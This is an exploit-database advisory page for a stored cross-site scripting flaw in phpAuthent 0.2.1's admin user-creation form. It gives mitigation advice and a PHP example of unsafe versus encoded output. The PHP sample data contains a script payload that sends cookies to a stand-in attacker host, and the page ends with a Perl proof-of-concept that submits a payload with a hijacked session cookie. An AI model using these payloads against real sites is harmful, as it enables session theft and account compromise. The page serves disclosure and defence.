phpAuthentAdmin permanent XSS - exploit.company
Vendor: phpAuthent
By: Yoyahack
CVSS: 5.5 (MEDIUM)
Type: HTML-injection (stored cross-site scripting)
CWE: 79
Product Name: phpAuthent
Affected Version From: 0.2.1
Affected Version To: 0.2.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
Year: 2010

phpAuthentAdmin permanent XSS

phpAuthent 0.2.1, through its phpAuthentAdmin interface, stores the account fields submitted to useradd.php (real name, login, password, e-mail) without sanitising or encoding them and later renders them back, so it is prone to multiple persistent (stored) HTML-injection / cross-site scripting vulnerabilities. Attacker-supplied HTML and script then run in the browser of whoever views the affected page, which can expose cookie-based session credentials or let the attacker control how the site is rendered to the user; other attacks are also possible. Note that the published proof of concept submits the payload together with a fixed PHPSESSID cookie, so it assumes the attacker already holds a valid session for phpAuthentAdmin (or can coerce a logged-in administrator into submitting the same form).

Mitigation:

No vendor patch is listed. To mitigate, validate the fields useradd.php accepts on input (for example, restrict login to a short alphanumeric token and require email to be a syntactically valid address) and, independently of validation, HTML-encode every stored value at the point it is written into a page, using the encoding that matches the output context (HTML body, attribute value, URL). Encoding on output is the control that actually neutralises the stored payload; input validation alone is easy to bypass for free-text fields such as the real name. A restrictive Content-Security-Policy on the admin pages limits the impact of anything that still slips through.
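As an added illustration (not phpAuthent's own code, whose source is not reproduced on this page), the following PHP contrasts an admin user-list row rendered by plain string concatenation, the pattern that turns a stored "name" field like the one the PoC writes into executable markup, with the same row rendered through context-aware output encoding plus input validation. The field names, function names and sample records are assumptions constructed for the example.

```php
<?php
// Added example, not phpAuthent's code. Field names, helper names and
// the two sample records below are assumptions constructed to mimic what
// the PoC writes through useradd.php (real name, login, e-mail).
declare(strict_types=1);

$users = [
    ['login' => 'aaa',
     'name'  => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
     'email' => '"><img src=x onerror=alert(1)>'],
    ['login' => 'bob', 'name' => "O'Brien & Sons", 'email' => 'bob@example.org'],
];

// Vulnerable pattern: stored values are concatenated straight into HTML,
// so whatever was stored is parsed as markup when an admin views the list.
function renderUserRowUnsafe(array $u): string
{
    return "<tr><td>{$u['login']}</td><td>{$u['name']}</td>"
         . "<td><a href=\"mailto:{$u['email']}\">{$u['email']}</a></td></tr>\n";
}

// Hardened: every stored value is encoded for the HTML context it lands in.
// ENT_QUOTES also encodes single quotes, so the same helper is safe inside
// both double- and single-quoted attribute values.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderUserRowSafe(array $u): string
{
    // The mailto: link gets a syntactically valid address or nothing at all;
    // an attribute-breaking string like the first record's e-mail is dropped.
    $email = filter_var($u['email'], FILTER_VALIDATE_EMAIL) !== false ? $u['email'] : '';
    $mail  = $email === '' ? '' : '<a href="mailto:' . h($email) . '">' . h($email) . '</a>';
    return '<tr><td>' . h($u['login']) . '</td><td>' . h($u['name']) . '</td>'
         . '<td>' . $mail . '</td></tr>' . "\n";
}

// Input-side validation for useradd.php is the second layer: reject logins
// that are not a short token before they are ever stored. Free-text fields
// such as the real name cannot be validated this way and rely on encoding.
function validLogin(string $login): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $login);
}

foreach ($users as $u) {
    echo 'unsafe: ' . renderUserRowUnsafe($u);
    echo 'safe:   ' . renderUserRowSafe($u);
}

// Self-check: the encoded output must never contain a raw "<script" tag,
// while the unsafe rendering of the first record does.
foreach ($users as $u) {
    if (stripos(renderUserRowSafe($u), '<script') !== false) {
        throw new RuntimeException('encoded output still contains a script tag');
    }
}
if (stripos(renderUserRowUnsafe($users[0]), '<script') === false) {
    throw new RuntimeException('unsafe rendering should reproduce the stored payload');
}
if (validLogin('aaa') !== true || validLogin('a b<c>') !== false) {
    throw new RuntimeException('login validation is wrong');
}
```

Run it with `php example.php`: the "unsafe" lines carry the stored script and the broken mailto attribute verbatim, the "safe" lines show `&lt;script&gt;` and an empty e-mail cell for the first record, and the second record (`O'Brien & Sons`) survives intact as `O&apos;Brien &amp; Sons`.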
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38908/info


phpAuthent is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

phpAuthent 0.2.1 is vulnerable; other versions may also be affected.

# Exploit Title: phpAuthentAdmin permanent XSS
# Date: 2010-03-21
# Author: Yoyahack
# Software Link: http://sourceforge.net/projects/phpauth/files/phpAuthent/phpAuthent%200.2.1/phpAuthent-0.2.1-20050828-116.zip/download
# Version: 0.2.1
# Tested on: linux
 
#Exploit:
 
#!/usr/bin/perl
#Autor: Yoyahack
#Web: http://undersecurity.net
#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

#Source

print q(---------------------------------
Autor: Yoyahack
Web: http://undersecurity.net
Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
---------------------------------
);

# Usage: perl phpauthent_xss.pl <host> [payload] [PHPSESSID]
if(!$ARGV[0]){
  print "Insert web\n";
  print "Ex: www.webpage.com\n";
  exit;
}

my $host = $ARGV[0];

# The payload between qq() was lost when this listing was rendered as
# HTML, so it is left empty here exactly as published; pass your own as
# the second argument. It is stored in the "real name" field unencoded.
my $xss = defined $ARGV[1] ? $ARGV[1] : qq();

# Session cookie of an already logged-in phpAuthentAdmin user. The
# published PoC hard-codes this value, so it only works against a
# session you control; override it with the third argument.
my $sess = defined $ARGV[2] ? $ARGV[2] : 'cf1c170aa9d334d6cec1514e721573e6';

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre) ".
           "Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");

# The original listed "action" four times in this hash (changerealname,
# rename, password, changeemail). Perl keeps only the last duplicate key,
# so the request body actually carries action=changeemail while the
# query string carries action=create; the fields below are exactly what
# was sent. LWP does not follow redirects for POST, so the Location
# header of the 302 reply is visible to the check further down.
my $response = $ua->request(
   POST "http://$host/phpauthent/phpauthentadmin/useradd.php?action=create",
   {
   action   => 'changeemail',
   name     => $xss,
   login    => 'aaa',
   password => 'XSS',
   email    => 'XSS',
   },
   'Cookie' => "PHPSESSID=$sess",
);

# The script treats a redirect to index.php?msg=001 as a successful
# account creation; anything else (or no Location header) is a failure.
my $loc = 'index.php?msg=001';
my $got = $response->header('location');
if(defined $got && $loc eq $got){
  print "\n\nExploit sent!\n";
  exit;
}
print "\n\nExploit failed\n";